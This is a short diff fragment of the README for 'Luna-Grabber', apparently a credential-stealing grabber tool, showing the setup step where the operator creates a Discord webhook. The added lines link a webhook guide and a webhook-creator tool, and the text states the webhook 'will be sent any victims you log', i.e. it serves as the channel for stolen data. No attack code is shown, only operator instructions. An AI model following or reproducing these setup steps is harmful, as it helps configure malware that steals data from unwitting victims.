Smug246/Luna-Grabber/README.md

 ### 4. Create A Webhook:

 ```
+If you don't know how to make a webhook you can follow this guide: https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks
+If that is to hard for you, you can also use this tool: https://github.com/Serpensin/DiscordBots-WebhookCreator

 This webhook will be sent any victims you log so don't delete it once it's made.
 Once you've created one paste it
 into the box which asks for your webhook.
 ```